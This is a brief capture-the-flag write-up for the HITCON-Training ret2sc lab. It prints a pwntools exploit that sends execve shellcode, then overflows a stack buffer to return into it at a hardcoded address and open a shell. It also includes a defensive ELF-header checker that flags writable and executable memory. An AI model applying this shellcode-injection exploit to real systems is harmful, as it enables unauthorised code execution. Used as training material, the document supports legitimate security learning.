HITCON-Training-master lab3 wp


Author: zs0zrc | Source: published 2018-07-28 20:09, read 36 times

    Stack overflow, then execute shellcode.
    exp:

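    from pwn import *

    context.log_level = "debug"
    p = process('./ret2sc')
    elf = ELF('./ret2sc')
    # stack overflow, then return into shellcode that makes the execve syscall
    read_plt = elf.symbols['read']  # looked up but not used below
    bss = elf.bss()                 # looked up but not used below

    log.info("-----------send shellcode----------------")
    # stage 1: the shellcode is sent as the answer to the "Name:" prompt
    payload1 = asm(shellcraft.sh())
    p.recvuntil(b"Name:")
    p.sendline(payload1)

    log.info("-----------return shellcode-----------------")
    pause()  # wait here so a debugger can be attached
    # stage 2: 0x1c filler bytes + 'bbbb' + the hardcoded address to return to
    # (bytes literals so the concatenation with p32() also works on Python 3)
    payload2 = b'a' * 0x1c + b'bbbb' + p32(0x0804a060)
    p.recvuntil(b"Try your best:")
    p.send(payload2)

    p.interactive()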
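
Returning into injected shellcode only works when the memory holding it is both writable and executable, so the defensive counterpart is to check what a binary's ELF headers request. The following is an added example, not part of the original write-up: `wx_findings` and `build_sample` are hypothetical names, and the sample ELF bytes are constructed for illustration rather than read from `./ret2sc`.

```python
import struct

PT_LOAD, PT_GNU_STACK = 1, 0x6474E551   # program header types from the ELF spec
PF_X, PF_W = 1, 2                       # segment permission bits

def wx_findings(elf: bytes) -> list:
    """List the ways a 32-bit little-endian ELF asks for writable+executable memory."""
    if elf[:4] != b"\x7fELF" or elf[4] != 1 or elf[5] != 1:
        raise ValueError("expected a 32-bit little-endian ELF")
    (e_phoff,) = struct.unpack_from("<I", elf, 28)
    e_phentsize, e_phnum = struct.unpack_from("<HH", elf, 42)
    findings, saw_stack = [], False
    for i in range(e_phnum):
        # Elf32_Phdr: type, offset, vaddr, paddr, filesz, memsz, flags, align
        p_type, _, vaddr, _, _, memsz, flags, _ = struct.unpack_from(
            "<8I", elf, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            saw_stack = True
            if flags & PF_X:
                findings.append("PT_GNU_STACK is executable")
        elif p_type == PT_LOAD and flags & PF_W and flags & PF_X:
            findings.append(f"PT_LOAD {vaddr:#x}-{vaddr + memsz:#x} is writable and executable")
    if not saw_stack:
        findings.append("no PT_GNU_STACK header; loader falls back to its default")
    return findings

def build_sample(stack_flags: int, data_flags: int = 6) -> bytes:
    """Constructed sample (not read from ./ret2sc): ELF32 header + 3 program headers."""
    ident = b"\x7fELF" + bytes([1, 1, 1]) + bytes(9)
    ehdr = struct.pack("<16sHHIIIIIHHHHHH", ident, 2, 3, 1, 0x08048000,
                       52, 0, 0, 52, 32, 3, 0, 0, 0)
    phdrs = [
        (PT_LOAD, 0, 0x08048000, 0x08048000, 0x1000, 0x1000, 5, 0x1000),  # R+X text
        (PT_LOAD, 0x1000, 0x0804A000, 0x0804A000, 0x100, 0x200, data_flags, 0x1000),
        (PT_GNU_STACK, 0, 0, 0, 0, 0, stack_flags, 0x10),
    ]
    return ehdr + b"".join(struct.pack("<8I", *p) for p in phdrs)

if __name__ == "__main__":
    for label, sample in [("execstack", build_sample(7)), ("hardened", build_sample(6))]:
        print(label, wx_findings(sample) or "no writable+executable memory requested")
```

An empty result means the headers request no writable and executable memory, which is what a build without `-z execstack` produces.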
    

Link to this article: https://www.haomeiwen.com/subject/mqkamftx.html